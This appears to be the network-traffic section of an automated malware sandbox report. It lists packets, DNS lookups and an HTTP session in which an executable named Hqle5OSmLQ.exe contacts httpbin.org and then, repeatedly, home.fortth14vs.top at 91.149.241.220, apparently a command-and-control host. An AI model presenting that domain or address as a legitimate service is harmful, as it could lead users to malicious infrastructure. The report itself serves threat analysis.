Dec 31, 2024 09:45:27.269809008 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269846916 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269881010 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269929886 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.269938946 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270006895 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270102024 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270112038 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270138025 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270159006 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270185947 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270226955 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270266056 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270281076 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270308018 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270431042 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.270442009 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.271785975 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.271857977 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.274442911 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.274499893 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.274571896 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.274682999 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.274744987 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.274823904 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.274833918 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275116920 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275154114 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275214911 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275223970 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275233984 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275244951 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275389910 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275399923 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275409937 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275418997 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275429010 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275437117 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275445938 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275463104 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275471926 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275480986 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.275825977 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.275872946 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.276715040 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.276725054 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.276803970 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.276849985 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.276921034 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.276931047 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.276941061 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.276949883 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277003050 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277013063 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277024031 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277065039 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277074099 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277090073 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277100086 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277123928 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277136087 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277151108 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277160883 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277216911 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277226925 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277236938 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277261019 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277271032 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277280092 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277357101 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277365923 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277441978 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277451038 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277504921 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277513981 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277553082 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277561903 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277650118 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277658939 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277741909 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277750969 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277875900 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277885914 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277895927 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.277909040 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278017044 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278026104 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278105021 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278114080 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278141022 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278150082 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278172970 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278183937 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278199911 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278211117 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278337955 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.278347969 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.280846119 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.280854940 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.280859947 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.280864000 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.280942917 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.280952930 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.280962944 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.280972958 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281001091 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281016111 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281033993 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281043053 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281074047 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281119108 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281161070 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281217098 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.281255007 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281260967 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.281265974 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281308889 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281317949 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281373978 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281383991 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281611919 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281621933 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281677961 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281694889 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281774998 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281785011 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281821012 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281830072 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281868935 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281877041 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281961918 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.281970978 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282012939 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282023907 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282042027 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282052040 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282068968 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282078028 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282125950 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282135010 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282157898 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282166958 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282211065 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282250881 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282300949 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282310009 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282337904 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282346964 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282394886 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282403946 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282454014 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.282464981 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286216974 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286227942 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286416054 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286437988 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286457062 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286467075 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286485910 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:27.286578894 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286588907 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286676884 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286689043 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286791086 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286803007 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286833048 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286843061 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286978960 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.286988974 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287168980 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287178993 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287189007 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287199020 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287209034 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287216902 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287225962 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287235022 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287251949 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287261009 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287276983 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287286043 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287401915 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287412882 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287421942 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287431002 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287439108 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287447929 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287466049 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287476063 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287483931 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287492990 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287511110 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287519932 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287539959 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287549019 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287653923 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287662983 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287672997 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287683010 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287700891 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287708998 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287750006 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287760019 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287800074 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287810087 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.287827015 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291374922 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291387081 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291431904 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291441917 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291533947 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291543007 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291585922 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291594982 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291711092 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291721106 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291757107 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291765928 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291842937 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291851997 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291930914 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291940928 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291949034 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291960955 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291979074 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.291989088 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292007923 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292016983 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292056084 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292067051 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292085886 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292097092 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292232037 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292241096 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292249918 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292258978 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292268038 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292275906 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292293072 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292301893 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292311907 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292320967 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292355061 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292362928 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292380095 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:27.292390108 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:30.049329042 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:30.049490929 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:30.049549103 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:30.049798012 CET	49706	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:30.054636002 CET	80	49706	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:30.135761023 CET	49707	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:30.140561104 CET	53	49707	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:30.140626907 CET	49707	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:30.140806913 CET	49707	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:30.145600080 CET	53	49707	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:30.843120098 CET	53	49707	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:30.843703985 CET	49707	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:30.844070911 CET	49708	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:30.848798037 CET	53	49707	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:30.848858118 CET	49707	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:30.848892927 CET	80	49708	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:30.848994970 CET	49708	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:30.855302095 CET	49708	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:30.860127926 CET	80	49708	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:31.633109093 CET	80	49708	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:31.633277893 CET	80	49708	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:31.633343935 CET	49708	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:31.633646965 CET	49708	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:31.638470888 CET	80	49708	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:32.507060051 CET	49709	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:32.511905909 CET	80	49709	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:32.511970043 CET	49709	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:32.515388966 CET	49709	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:32.520139933 CET	80	49709	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:33.408844948 CET	80	49709	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:33.409029961 CET	80	49709	91.149.241.220	192.168.2.10
Dec 31, 2024 09:45:33.409092903 CET	49709	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:33.409415960 CET	49709	80	192.168.2.10	91.149.241.220
Dec 31, 2024 09:45:33.414164066 CET	80	49709	91.149.241.220	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:45:23.103982925 CET	64715	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:23.104049921 CET	64715	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:23.110733032 CET	53	64715	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:23.111239910 CET	53	64715	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:26.032902956 CET	64718	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:26.032957077 CET	64718	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:26.573601961 CET	53	64718	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:26.783350945 CET	53	64718	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:30.128298998 CET	64720	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:30.128354073 CET	64720	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:30.135452032 CET	53	64720	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:30.437493086 CET	53	64720	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:31.700864077 CET	64722	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:31.701668978 CET	64722	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:32.320027113 CET	53	64722	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:32.506172895 CET	53	64722	1.1.1.1	192.168.2.10
Dec 31, 2024 09:45:52.128952980 CET	53	59915	162.159.36.2	192.168.2.10
Dec 31, 2024 09:45:52.599133015 CET	49698	53	192.168.2.10	1.1.1.1
Dec 31, 2024 09:45:52.606662035 CET	53	49698	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 09:45:23.103982925 CET	192.168.2.10	1.1.1.1	0xe0da	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:23.104049921 CET	192.168.2.10	1.1.1.1	0x1d49	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 31, 2024 09:45:26.032902956 CET	192.168.2.10	1.1.1.1	0x27b1	Standard query (0)	home.fortth14vs.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:26.032957077 CET	192.168.2.10	1.1.1.1	0xf25a	Standard query (0)	home.fortth14vs.top	28	IN (0x0001)	false
Dec 31, 2024 09:45:30.128298998 CET	192.168.2.10	1.1.1.1	0xea69	Standard query (0)	home.fortth14vs.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:30.128354073 CET	192.168.2.10	1.1.1.1	0x7693	Standard query (0)	home.fortth14vs.top	28	IN (0x0001)	false
Dec 31, 2024 09:45:30.140806913 CET	192.168.2.10	1.1.1.1	0xea69	Standard query (0)	home.fortth14vs.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:31.700864077 CET	192.168.2.10	1.1.1.1	0x6fee	Standard query (0)	home.fortth14vs.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:31.701668978 CET	192.168.2.10	1.1.1.1	0xdcf1	Standard query (0)	home.fortth14vs.top	28	IN (0x0001)	false
Dec 31, 2024 09:45:52.599133015 CET	192.168.2.10	1.1.1.1	0xda53	Standard query (0)	18.31.95.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 09:45:23.111239910 CET	1.1.1.1	192.168.2.10	0xe0da	No error (0)	httpbin.org		34.197.122.172	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:23.111239910 CET	1.1.1.1	192.168.2.10	0xe0da	No error (0)	httpbin.org		34.200.57.114	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:26.573601961 CET	1.1.1.1	192.168.2.10	0x27b1	No error (0)	home.fortth14vs.top		91.149.241.220	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:30.843120098 CET	1.1.1.1	192.168.2.10	0xea69	No error (0)	home.fortth14vs.top		91.149.241.220	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:32.506172895 CET	1.1.1.1	192.168.2.10	0x6fee	No error (0)	home.fortth14vs.top		91.149.241.220	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:45:52.606662035 CET	1.1.1.1	192.168.2.10	0xda53	Name error (3)	18.31.95.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fortth14vs.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49706	91.149.241.220	80	8060	C:\Users\user\Desktop\Hqle5OSmLQ.exe

Timestamp	Bytes transferred	Direction	Data
